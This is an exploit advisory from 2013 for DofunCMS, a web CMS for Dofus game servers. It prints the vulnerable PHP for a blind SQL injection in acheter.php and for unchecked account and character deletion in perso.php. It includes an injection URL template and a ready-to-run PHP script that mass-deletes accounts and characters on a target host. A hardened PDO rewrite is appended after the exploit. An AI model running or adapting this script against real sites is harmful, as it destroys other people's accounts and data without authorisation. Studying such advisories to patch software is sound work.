
DofunCMS - Multiple Vulnerabilities

Author: The UnKnØwN, Published: 14-01-2013
+-----------------------------------------------------------------------------+
¦ DofunCMS - Multiple Vulnerabilities ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ -- _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__).com ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - Kalashinkov3 - Caddy-Dz - Ked'Ans-Dz ¦
¦ BenzØ - Soka - Hony - Pincki - Linkce16 - Mooh Splinter ¦
¦ The Spark - F3i - w0dm4n ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : [Dofus] DofunCMS - Multiple Vulnerabilities ¦
¦ [+] date : 12-01-2013 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] home : http://www.rpg-exploit.com/ ¦
¦ [+] version : all ¦
¦ [+] category : webapps ¦
¦ [+] tested on : Windows 7, Apache/2.2.22 (Win32) PHP/5.4.3 ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ ¦
1) Blind SQL Injection (you need to be logged in)
The "objet" GET parameter in "/pages/acheter.php" is concatenated straight into the SQL query, with no escaping or validation:

$error = FALSE;
if (!$connect) $error = 1; // check that the user is logged in
if (!$error) // check that the item exists
{
    $rep = mysql_fetch_array(mysql_query("SELECT ID FROM boutique_objets WHERE ID='".$_GET['objet']."'"));
    if (!isset($rep[0])) $error = 2;
}


Exploit:

http://site/path/index.php?p=acheter&objet={Inject}


2) Accounts/Characters Delete (you need to be logged in)
In /pages/perso.php the "delp" and "dela" GET parameters are handed to deletePerso() and deleteAccount() after only a secu() call, with nothing in the handler checking that the character or account belongs to the logged-in user:

if(isset($_GET['delp']))
{
    $_GET['delp'] = secu($_GET['delp']);
    $nomPerso = nomPerso($_GET['delp']);
    if(deletePerso($_GET['delp']))
    {
        $done = TRUE;
        $doneMSG = 'Le personnage "'.$nomPerso.'" à été supprimé correctement';
    }
    else
    {
        $done = FALSE;
        $doneMSG = "Le personnage n'a pu être supprimé";
    }
}

if(isset($_GET['dela']))
{
    $_GET['dela'] = secu($_GET['dela']);

    $nomAccount = nomAccount($_GET['dela']);
    if(deleteAccount($_GET['dela']))
    {
        $done = TRUE;
        $doneMSG = 'Le compte "'.$nomAccount.'" et tout ses personnages ont été supprimé correctement';
    }
    else
    {
        $done = FALSE;
        $doneMSG = "Le compte n'a pu être supprimé";
    }
}



PoC:

<?php
/*
!dofun_delete
@ HOST = localhost = Target URL
@ PORT = 80 = Target PORT
@ PATH = / = Web site path
*/
error_reporting(0);
set_time_limit(0);
$host = $argv[1];
$port = $argv[2]; // read but never used: the requests below always go to port 80
$path = $argv[3];
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Dofun Accounts/Characters Delete                                    |";
print "\n|                                by The UnKn0wN                       |";
print "\n|     Greets to : The Crazy3D's members and all Algerian h4x0rs       |";
print "\n+---------------------------------------------------------------------+";
print "\n|                         www.RPG-Exploit.com                         |";
print "\n+---------------------------------------------------------------------+\n";
print "Deleting accounts ...";
file_get_contents("http://".$host.$path."index.php?p=perso&dela=1%20or%202%20or%203");
print "Done ! \n";
sleep(1);
print "Deleting characters ...";
file_get_contents("http://".$host.$path."index.php?p=perso&delp=1%20or%202%20or%203");
print "Done ! \n Exploit Finished Check by your self!\n";
?>
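Both issues above share one root cause: request values are trusted as-is, and writes are never scoped to the user who is logged in. The following is an added example of hardened replacements for the acheter.php query and the perso.php character delete; it is not DofunCMS code and not the advisory author's. It assumes an open PDO handle $pdo, a session variable $_SESSION['account_id'] set at login, and a hypothetical owner column "compte" on a "personnages" table.

```php
<?php
// Added example, not DofunCMS code. Assumptions: $pdo is an open PDO
// connection, $_SESSION['account_id'] holds the logged-in account's id, and
// the characters table `personnages` has an owner column `compte`
// (table and column names are hypothetical).
session_start();

// 1) acheter.php: bind `objet` instead of splicing it into the SQL string,
// so the value can never change the structure of the query.
function itemExists(PDO $pdo, string $objet): bool
{
    $stmt = $pdo->prepare('SELECT ID FROM boutique_objets WHERE ID = ?');
    $stmt->execute([$objet]);
    return $stmt->fetchColumn() !== false;
}

// 2) perso.php: a delete must arrive by POST with a per-session CSRF token,
// carry a real integer id, and only ever touch rows owned by the caller.
function csrfTokenIsValid(): bool
{
    // hash_equals() needs PHP >= 5.6 (constant-time comparison).
    return isset($_POST['token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $_POST['token']);
}

function deleteOwnCharacter(PDO $pdo, int $accountId, int $persoId): bool
{
    // Scoping the DELETE to the owner turns a forged id into a no-op.
    $stmt = $pdo->prepare('DELETE FROM personnages WHERE id = ? AND compte = ?');
    $stmt->execute([$persoId, $accountId]);
    return $stmt->rowCount() === 1;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delp'])) {
    if (!isset($_SESSION['account_id']) || !csrfTokenIsValid()) {
        http_response_code(403);
        exit;
    }
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer,
    // including the "1 or 2 or 3" style values used in the PoC.
    $persoId = filter_var($_POST['delp'], FILTER_VALIDATE_INT);
    if ($persoId === false) {
        http_response_code(400);
        exit;
    }
    $done = deleteOwnCharacter($pdo, (int) $_SESSION['account_id'], $persoId);
    $doneMSG = $done ? 'Character deleted' : 'Character could not be deleted';
}
```

The account delete ("dela") follows the same pattern, with the DELETE scoped to the account id taken from the session rather than from the request.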



¦ ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+
